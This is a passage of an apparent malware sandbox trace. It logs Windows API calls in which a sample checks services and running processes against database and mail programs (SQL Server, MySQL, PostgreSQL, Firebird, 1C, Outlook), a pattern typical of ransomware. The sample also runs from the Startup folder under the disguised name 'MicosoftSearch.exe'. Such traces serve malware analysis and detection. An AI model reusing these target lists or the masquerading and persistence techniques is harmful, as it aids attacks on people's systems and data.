lpString2="Themes") returned -1 [0240.061] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0240.061] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0240.061] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0240.061] lstrlenW (lpString="UxSms") returned 5 [0240.061] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0240.061] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0240.061] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0240.061] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0240.061] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0240.061] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb86038 | out: hHeap=0xb00000) returned 1 [0240.061] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe0 [0240.063] Process32FirstW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0240.063] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0240.063] lstrlenW (lpString="System") returned 6 [0240.063] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0240.063] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0240.063] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0240.063] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0240.063] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0240.063] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0240.063] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0240.064] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0240.064] lstrlenW (lpString="smss.exe") returned 8 [0240.064] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0240.064] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0240.064] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0240.064] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0240.064] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0240.064] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0240.064] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0240.064] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0240.064] lstrlenW (lpString="csrss.exe") returned 9 [0240.064] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0240.064] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0240.064] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0240.064] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0240.064] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0240.064] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0240.064] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0240.064] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0240.065] lstrlenW (lpString="wininit.exe") returned 11 [0240.065] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0240.065] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0240.065] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0240.065] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0240.065] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0240.065] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0240.065] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0240.065] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0240.065] lstrlenW (lpString="csrss.exe") returned 9 [0240.065] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0240.065] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0240.065] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0240.065] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0240.065] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0240.065] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0240.065] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0240.065] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0240.065] lstrlenW (lpString="winlogon.exe") returned 12 [0240.066] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0240.066] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0240.066] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0240.066] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0240.066] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0240.066] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0240.066] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0240.066] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0240.066] lstrlenW (lpString="services.exe") returned 12 [0240.066] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0240.066] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0240.066] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0240.066] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0240.066] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0240.066] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0240.066] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0240.066] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x180, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0240.066] lstrlenW (lpString="lsass.exe") returned 9 [0240.066] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0240.066] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0240.066] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0240.066] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0240.067] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0240.067] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0240.067] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0240.067] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0240.067] lstrlenW (lpString="lsm.exe") returned 7 [0240.067] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0240.067] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0240.067] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0240.067] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0240.067] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0240.067] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0240.067] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0240.067] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.067] lstrlenW (lpString="svchost.exe") returned 11 [0240.067] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0240.067] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0240.067] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0240.067] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0240.067] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0240.067] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0240.067] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0240.067] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.068] lstrlenW (lpString="svchost.exe") returned 11 [0240.068] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0240.068] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0240.068] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0240.068] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0240.068] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0240.068] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0240.068] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0240.068] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.068] lstrlenW (lpString="svchost.exe") returned 11 [0240.068] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0240.068] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0240.068] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0240.068] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0240.068] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0240.068] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0240.068] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0240.068] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 1 [0240.069] lstrlenW (lpString="LogonUI.exe") returned 11 [0240.069] lstrcmpiW (lpString1="1c8.exe", lpString2="LogonUI.exe") returned -1 [0240.069] lstrcmpiW (lpString1="1cv77.exe", lpString2="LogonUI.exe") returned -1 [0240.069] lstrcmpiW (lpString1="outlook.exe", lpString2="LogonUI.exe") returned 1 [0240.069] lstrcmpiW (lpString1="postgres.exe", lpString2="LogonUI.exe") returned 1 [0240.069] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="LogonUI.exe") returned 1 [0240.069] lstrcmpiW (lpString1="mysqld.exe", lpString2="LogonUI.exe") returned 1 [0240.069] lstrcmpiW (lpString1="sqlservr.exe", lpString2="LogonUI.exe") returned 1 [0240.069] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.069] lstrlenW (lpString="svchost.exe") returned 11 [0240.069] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0240.069] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0240.069] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0240.069] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0240.069] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0240.069] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0240.069] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0240.069] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.069] lstrlenW (lpString="svchost.exe") returned 11 [0240.069] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0240.069] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0240.070] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0240.070] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0240.070] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0240.070] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0240.070] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0240.070] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0240.070] lstrlenW (lpString="audiodg.exe") returned 11 [0240.070] lstrcmpiW (lpString1="1c8.exe", lpString2="audiodg.exe") returned -1 [0240.070] lstrcmpiW (lpString1="1cv77.exe", lpString2="audiodg.exe") returned -1 [0240.070] lstrcmpiW (lpString1="outlook.exe", lpString2="audiodg.exe") returned 1 [0240.070] lstrcmpiW (lpString1="postgres.exe", lpString2="audiodg.exe") returned 1 [0240.070] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="audiodg.exe") returned 1 [0240.070] lstrcmpiW (lpString1="mysqld.exe", lpString2="audiodg.exe") returned 1 [0240.071] lstrcmpiW (lpString1="sqlservr.exe", lpString2="audiodg.exe") returned 1 [0240.071] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.073] lstrlenW (lpString="svchost.exe") returned 11 [0240.073] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0240.073] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0240.074] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0240.074] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0240.074] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0240.074] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0240.074] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0240.074] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.075] lstrlenW (lpString="svchost.exe") returned 11 [0240.075] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0240.075] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0240.075] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0240.075] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0240.075] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0240.075] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0240.075] lstrlenW (lpString="userinit.exe") returned 12 [0240.075] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x340, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0240.075] lstrlenW (lpString="dwm.exe") returned 7 [0240.075] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0240.076] lstrlenW (lpString="explorer.exe") returned 12 [0240.076] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0240.076] lstrlenW (lpString="spoolsv.exe") returned 11 [0240.076] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0240.076] lstrlenW (lpString="taskhost.exe") returned 12 [0240.076] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.076] lstrlenW (lpString="svchost.exe") returned 11 [0240.076] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0240.077] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0240.077] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0240.077] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0240.077] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0240.077] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0240.077] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0240.077] lstrlenW (lpString="reader_sl.exe") returned 13 [0240.077] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="AdobeARM.exe")) returned 1 [0240.078] lstrlenW (lpString="AdobeARM.exe") returned 12 [0240.078] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="AdobeARM.exe")) returned 0 [0240.078] CloseHandle (hObject=0xe0) returned 1 [0240.078] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb82118 | out: hHeap=0xb00000) returned 1 [0240.078] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb82160 | out: hHeap=0xb00000) returned 1 [0240.078] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb821a8 | out: hHeap=0xb00000) returned 1 [0240.078] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb821c8 | out: hHeap=0xb00000) returned 1 [0240.078] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb821e8 | out: hHeap=0xb00000) returned 1 [0240.078] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb7d5e0 | out: hHeap=0xb00000) returned 1 [0240.078] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb820b8 | out: hHeap=0xb00000) returned 1 [0240.078] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb820d8 | out: hHeap=0xb00000) returned 1 [0240.078] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb5d068 | out: hHeap=0xb00000) returned 1 [0240.078] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb5d0b8 | out: hHeap=0xb00000) returned 1 [0240.078] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb820f8 | out: hHeap=0xb00000) returned 1 [0240.078] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb5d0e0 | out: hHeap=0xb00000) returned 1 [0240.078] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xfffe) returned 0xb87aa0 [0240.079] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xfffe) returned 0xb97aa8 [0240.079] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb7d5e0 [0240.079] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb7d5e0, Size=0x20) returned 0xb5d0e0 [0240.079] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb5d0e0, Size=0x40) returned 0xb82830 [0240.079] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb7d5e0 [0240.079] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb7d5e0, Size=0x20) returned 0xb5d0e0 [0240.079] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb7d5e0 [0240.079] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb7d5e0, Size=0x20) returned 0xb5d0b8 [0240.079] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb7d5e0 [0240.079] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb7d5e0, Size=0x20) returned 0xb5d068 [0240.079] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb5d068, Size=0x40) returned 0xb82878 [0240.079] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xb97aa8, nSize=0x7fff | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MicosoftSearch.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\micosoftsearch.exe")) returned 0x6e [0240.079] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xfffe) returned 0xba7ab0 [0240.080] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xfffe) returned 0xbb7ab8 [0240.080] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb7d5e0 [0240.080] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb7d5e0, Size=0x20) returned 0xb5d068 [0240.080] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb5d068, Size=0x40) returned 0xb828c0 [0240.080] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb828c0, Size=0x80) returned 0xb820b8 [0240.080] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb820b8, Size=0x100) returned 0xb820b8 [0240.080] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0240.080] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb820b8 | out: hHeap=0xb00000) returned 1 [0240.080] ExpandEnvironmentStringsW (in: lpSrc="%windir%\\System32\\MicosoftSearch.exe", lpDst=0xba7ab0, nSize=0x7fff | out: lpDst="C:\\Windows\\System32\\MicosoftSearch.exe") returned 0x27 [0240.080] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xbb7ab8 | 